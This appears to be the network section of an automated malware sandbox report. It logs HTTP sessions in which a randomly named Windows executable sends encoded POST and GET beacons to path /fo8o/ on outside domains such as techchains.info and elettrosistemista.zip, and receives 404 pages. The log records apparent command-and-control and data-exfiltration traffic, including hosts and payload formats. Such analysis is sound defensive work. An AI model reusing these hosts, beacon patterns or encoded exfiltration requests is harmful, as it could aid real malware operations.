                                                          May 23, 2024 20:22:08.272526026 CEST1236INData Raw: 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79
                                                          Data Ascii: all of the information youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png"
                                                          May 23, 2024 20:22:08.277290106 CEST1236INData Raw: 74 2d 73 69 7a 65 3a 37 35 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32
                                                          Data Ascii: t-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input
                                                          May 23, 2024 20:22:08.289488077 CEST672INData Raw: 6c 2d 62 75 74 74 6f 6e 2c 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69
                                                          Data Ascii: l-button,[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:non
                                                          May 23, 2024 20:22:08.289530993 CEST1236INData Raw: 65 3a 31 30 30 25 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64
                                                          Data Ascii: e:100%}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:9%}.container-content__container-ads{margin
                                                          May 23, 2024 20:22:08.295419931 CEST1236INData Raw: 6f 6c 6f 72 3a 23 30 61 34 38 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65
                                                          Data Ascii: olor:#0a48ff}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-e
                                                          May 23, 2024 20:22:08.295454025 CEST1236INData Raw: 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e
                                                          Data Ascii: _content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox20__input,.container-searchbox__bu105Ctton{border:0 none}.container-searchbox__button{cur
                                                          May 23, 2024 20:22:08.295488119 CEST1236INData Raw: 6d 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67
                                                          Data Ascii: m:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-me
                                                          May 23, 2024 20:22:08.303011894 CEST328INData Raw: 77 5f 5f 63 6f 6e 74 65 6e 74 2d 6e 65 63 65 73 73 61 72 79 2d 63 6f 6f 6b 69 65 73 2d 72 6f 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 65 65 31 65 33 7d 2e 64 69 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a
                                                          Data Ascii: w__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;tra
                                                          May 23, 2024 20:22:08.303047895 CEST1236INData Raw: 6e 74 2d 73 69 7a 65 3a 78 2d 6c 61 72 67 65 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b
                                                          Data Ascii: nt-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:
                                                          May 23, 2024 20:22:08.307490110 CEST1236INData Raw: 70 75 74 3a 66 6f 63 75 73 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72
                                                          Data Ascii: put:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-color:#262626;font-family:Arial,Helvetica,Ve


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.84973666.29.149.46803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:21.622417927 CEST786OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.techchains.info
                                                          Origin: http://www.techchains.info
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.techchains.info/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 38 6e 51 5a 53 52 75 43 52 4d 53 61 68 49 73 7a 47 4e 79 79 56 42 6f 30 43 49 6a 72 37 53 73 59 6e 36 30 39 74 77 3d
                                                          Data Ascii: Plm0mn68=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI8nQZSRuCRMSahIszGNyyVBo0CIjr7SsYn609tw=
                                                          May 23, 2024 20:22:22.247461081 CEST637INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:22 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.84973766.29.149.46803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:24.712151051 CEST806OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.techchains.info
                                                          Origin: http://www.techchains.info
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.techchains.info/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 44 30 42 67 56 75 4d 50 45 43 45 71 45 6a 36 6c 52 47 34 69 32 55 37 65 5a 33 6f 75 58 2f 52 73 2b 46 6d 46 4e
                                                          Data Ascii: Plm0mn68=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpD0BgVuMPECEqEj6lRG4i2U7eZ3ouX/Rs+FmFN
                                                          May 23, 2024 20:22:25.332365036 CEST637INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:25 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.84973866.29.149.46803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:27.245023966 CEST1823OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.techchains.info
                                                          Origin: http://www.techchains.info
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.techchains.info/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 56 4d 79 77 42 4d 2f 6e 74 50 61 42 6b 57 73 67 36 6c 52 57 39 61 68 53 39 48 52 2f 70 76 2f 71 46 59 78 43 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 4a 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 [TRUNCATED]
                                                          Data Ascii: Plm0mn68=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1yVMywBM/ntPaBkWsg6lRW9ahS9HR/pv/qFYxCS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JVW7MJLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpujvRh4ZoEGHiegByUvb1M5qwhQSDlRkp0e8S8VpcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyNeNQtzD3qWuxSTmhP3rLqvAXgwdN9w/Tb2N80mcSLMi1Yr1hmzkZxo7kTH/DuDHPROmGg//8IkAbpDdAmV7HCf6T9siapFA6q/EEOeeLtU4qr27rYFjeh5udexbT30M9Oimqu12VsUlyr+ANXUFZ306OFN/h6IdECQKyBtB3n5iMmORDGiQ3CgrxsPAORyXyVMr33le3eV8xPwPxIsS289K7/Bt2El+zKwYkfPbJJGFJQu1NtynXxeE38+yGvFI59eiItItg8Q3g9hopAWVmVppI9IPgiQbe3CTGqsUpjc8/VdGOxW4z4ELoRubrBT8xnNTOa2hRwdJ0mTqyzwNzv6a6/l3pXdnu4EG5Z9M4yoaZ86GyF6WCGMePiAJfN1SnZJpqse5i7fSn/dSPgdjPlEcPbUzIC4zvUw6i5djlpNQMLfwIJ4PDxFBB6uEjMmVNiN74MJLmIbpcqPUqgLxY0uOFKUZZXUBBOnQEetVKAjAtPjqjkSEPXD7P/o/HxsFG1gN1ks4EJETWP [TRUNCATED]
                                                          May 23, 2024 20:22:27.931543112 CEST637INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:27 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.84973966.29.149.46803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:29.783529997 CEST521OUTGET /fo8o/?Plm0mn68=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd68f41LHWk1tWVOcLO2B4JSrTHSWnbApQ5HDH0jFdh0bEA==&kzN4Y=k0xDPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.techchains.info
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:22:30.373666048 CEST652INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:30 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.849740195.110.124.133803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:35.533545971 CEST804OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.elettrosistemista.zip
                                                          Origin: http://www.elettrosistemista.zip
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 7a 34 33 79 49 4d 31 49 66 4f 5a 37 6d 56 63 63 63 59 38 54 78 48 2b 6d 35 38 45 55 66 48 79 67 4b 62 4b 62 65 45 3d
                                                          Data Ascii: Plm0mn68=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiz43yIM1IfOZ7mVcccY8TxH+m58EUfHygKbKbeE=
                                                          May 23, 2024 20:22:36.229660988 CEST367INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:36 GMT
                                                          Server: Apache
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
